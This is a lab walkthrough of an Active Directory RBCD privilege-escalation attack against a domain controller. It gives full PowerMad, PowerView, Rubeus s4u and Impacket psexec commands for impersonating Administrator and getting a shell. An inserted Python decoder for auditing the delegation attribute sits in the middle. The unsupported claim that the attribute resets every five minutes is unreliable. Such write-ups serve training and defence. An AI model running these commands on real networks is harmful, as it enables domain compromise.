What is RBCD and how it works
RBCD (Resource-Based Constrained Delegation) is similar to classic constrained delegation, which lets you configure which services an account can delegate to. RBCD changes where that configuration lives: instead of specifying on the delegating account which service it may delegate to, you specify on the resource itself which objects are allowed to delegate to it. From an administrative standpoint, this lets the resource owner control who can access it.
- Another example: with constrained delegation you would specify that the zeba (domain user) account can delegate to the CIFS or LDAP service on DC01 to access the database.
- With RBCD you instead specify on the DC01 computer account (which hosts the CIFS and LDAP services) that the zeba (domain user) account has permission to delegate access to it.
Setting up the lab
⇒ To perform this RBCD attack a user or machine must have GenericWrite over another machine's AD object, so in the lab we grant the user zeba GenericWrite on DC01 using ADUC (Active Directory Users and Computers):
- Open the computer object's Properties, go to the Security tab, select the user and tick Write.
- From BloodHound's point of view you can now see that our user zeba has GenericWrite on the DC.
Performing the Attack
Creating Computer Object
⇒ To perform this attack the attacker must have write access to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a machine, as we can see in BloodHound.
- First we create a new computer object, AFTAB, in Active Directory using PowerMad:
New-MachineAccount -MachineAccount AFTAB -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
- Copy the machine SID of the new AFTAB computer account.
Modifying Target Computer’s AD Object
- Next we build a security descriptor whose ACE grants AFTAB's SID (copied above), and write it into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DC01:
# SDDL: owner Builtin Administrators (BA), one Access Allowed ACE for the AFTAB machine SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1011749309-1128044670-722997229-1119)"
# Serialise the descriptor to its binary (self-relative) form, which is what the attribute stores
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Write the bytes into DC01's attribute with PowerView
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
- Now we verify that msds-allowedtoactonbehalfofotheridentity has been set successfully:
Get-NetComputer DC01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Note: msds-allowedtoactonbehalfofotheridentity is reset after every 5 minutes.
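As an added example (not from the original post or the tools it uses), here is a small Python decoder for the binary security descriptor that msDS-AllowedToActOnBehalfOfOtherIdentity stores. A defender auditing for RBCD abuse can run decode_rbcd over the raw attribute bytes read from LDAP to list exactly which SIDs may delegate to a computer; because this runs offline, build_rbcd_sd constructs a sample descriptor with the same layout as the one the PowerShell above writes. The SDDL access mask and the AFTAB SID come from the page; the function names and the MS-DTYP field layout are my own assumptions.

```python
import struct

SE_SELF_RELATIVE = 0x8000         # control flag: offsets are relative to the descriptor start
SE_DACL_PRESENT = 0x0004          # control flag: the DACL offset is valid
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_MASK = 0xF01FF               # CCDCLCSWRPWPDTLOCRSDRCWDWO from the SDDL above

def sid_bytes(sid):
    """Encode 'S-1-5-21-...' as a binary SID: revision, count, 6-byte authority, subauthorities."""
    parts = sid.split("-")
    rev, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([rev, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def parse_sid(buf, off):
    """Decode the binary SID at buf[off] back to its string form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def build_rbcd_sd(allowed, owner="S-1-5-32-544", mask=RBCD_MASK):
    """Constructed sample input: a self-relative descriptor with owner BA and one allow ACE per SID."""
    owner_b = sid_bytes(owner)
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sb), mask) + sb
                    for sb in map(sid_bytes, allowed))
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed), 0) + aces   # ACL_REVISION_DS
    hdr = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                      20, 0, 0, 20 + len(owner_b))                           # owner, group, sacl, dacl offsets
    return hdr + owner_b + acl

def decode_rbcd(sd):
    """Return the owner SID and [(sid, mask)] for every principal the DACL allows to delegate."""
    rev, _, control, owner_off, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1:
        raise ValueError("unsupported SECURITY_DESCRIPTOR revision %d" % rev)
    owner = parse_sid(sd, owner_off) if owner_off else None
    allowed = []
    if control & SE_DACL_PRESENT and dacl_off:          # no DACL present means no one is listed
        _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
        off = dacl_off + 8
        for _ in range(ace_count):
            ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                allowed.append((parse_sid(sd, off + 8), mask))
            off += ace_size                             # skip deny/object ACEs by their own size
    return {"owner": owner, "allowed": allowed}
```

Any computer whose attribute decodes to a non-empty allowed list that nobody provisioned on purpose deserves a look, and the same decoder works on any raw NT security descriptor pulled from LDAP, not only this attribute.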
Execution
⇒ First we get the RC4 (NT) hash of the AFTAB machine account password using Rubeus:
.\Rubeus.exe hash /password:123456 /user:AFTAB /domain:crt.local
Then we use the s4u action to request a ticket for cifs/dc01.crt.local as Administrator and inject it into the current session (/ptt):
.\Rubeus.exe s4u /user:AFTAB$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/dc01.crt.local /outfile:dc.kirbi /ptt
For a computer account the username carries a trailing $ sign (AFTAB$).
- Now we can list the directory on DC01:
net use O: \\dc01.crt.local
O:
- We can also use PsExec to connect remotely (make sure PS remoting is enabled on the target host with Enable-PSRemoting).
Using the kirbi file on Kali
⇒ The ticket obtained from Rubeus can also be used from Kali. This is done by converting the base64-encoded kirbi ticket into a raw kirbi file, then converting that kirbi ticket to ccache, since Kali's tools don't support the kirbi format (it is Windows-specific and used with Rubeus).
- Copy dc_cifs_dc01.crt.local.kirbi to our Kali machine.
- Convert the kirbi file into ccache:
impacket-ticketConverter dc_cifs_dc01.crt.local.kirbi admin.ccache
- KRB5CCNAME is the environment variable that points to the credential cache holding the ticket; export it so the Impacket tools pick up the ccache file:
export KRB5CCNAME=/home/kali/admin.ccache
- Then run Impacket's psexec with Kerberos authentication (-k -no-pass) against DC01:
python3 psexec.py -k -no-pass crt.local/administrator@dc01.crt.local -dc-ip 192.168.1.109 -target-ip 192.168.1.109